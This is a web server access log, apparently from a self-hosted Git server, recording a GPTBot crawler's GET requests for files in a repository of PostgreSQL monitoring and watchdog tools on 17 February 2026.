compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" +[17/Feb/2026:13:53:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:13:53:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode" [Client 74.7.227.38] [Length 10161] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" +[17/Feb/2026:13:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 16783] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:13:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/files.zip" [Client 74.7.227.38] [Length 10846] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:13:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 10848] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" +[17/Feb/2026:13:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Postgres.ico" [Client 74.7.227.38] [Length 10807] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:13:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 9900] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md" +[17/Feb/2026:13:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:13:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 10408] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 10378] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 4095] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 21226] [Gzip 10.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 17707] [Gzip 9.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py" +[17/Feb/2026:13:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py" +[17/Feb/2026:13:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libpq.dll" +[17/Feb/2026:13:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Postgres.ico" [Client 74.7.227.38] [Length 9903] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Postgres.ico" +[17/Feb/2026:13:53:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 215878] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:13:53:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 6721] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md" +[17/Feb/2026:13:53:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 212038] [Gzip 17.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:13:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 21608] [Gzip 12.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md" +[17/Feb/2026:13:53:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 872716] [Gzip 23.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libpq.dll" +[17/Feb/2026:13:53:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 436304] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libpq.dll" +[17/Feb/2026:13:53:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 12071] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:53:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Postgres.ico" [Client 74.7.227.38] [Length 55987] [Gzip 36.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Postgres.ico" +[17/Feb/2026:13:53:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/files.zip" [Client 74.7.227.38] [Length 45179] [Gzip 9.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/files.zip" +[17/Feb/2026:13:53:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode" [Client 74.7.227.38] [Length 9902] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode" +[17/Feb/2026:13:53:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 5415] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py" +[17/Feb/2026:13:53:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Postgres.ico" [Client 74.7.227.38] [Length 31682] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Postgres.ico" +[17/Feb/2026:13:53:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/files.zip" [Client 74.7.227.38] [Length 11103] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/files.zip" +[17/Feb/2026:13:53:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/files.zip" [Client 74.7.227.38] [Length 9908] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/files.zip" +[17/Feb/2026:13:53:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9982] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:53:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:53:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:53:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/README.md" [Client 74.7.227.38] [Length 10890] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest" +[17/Feb/2026:13:53:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10900] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist" +[17/Feb/2026:13:53:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 16593] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" +[17/Feb/2026:13:53:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 29881] [Gzip 12.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:53:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 29273] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:13:53:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 10969] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:13:53:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 12356] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:13:53:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 12089] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:13:53:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 15779] [Gzip 4.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" +[17/Feb/2026:13:53:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/main.py" [Client 74.7.227.38] [Length 19736] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest" +[17/Feb/2026:13:53:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service?display=rendered" [Client 74.7.227.38] [Length 10923] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service" +[17/Feb/2026:13:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/README.md" +[17/Feb/2026:13:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10170] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9511] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 8940786] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 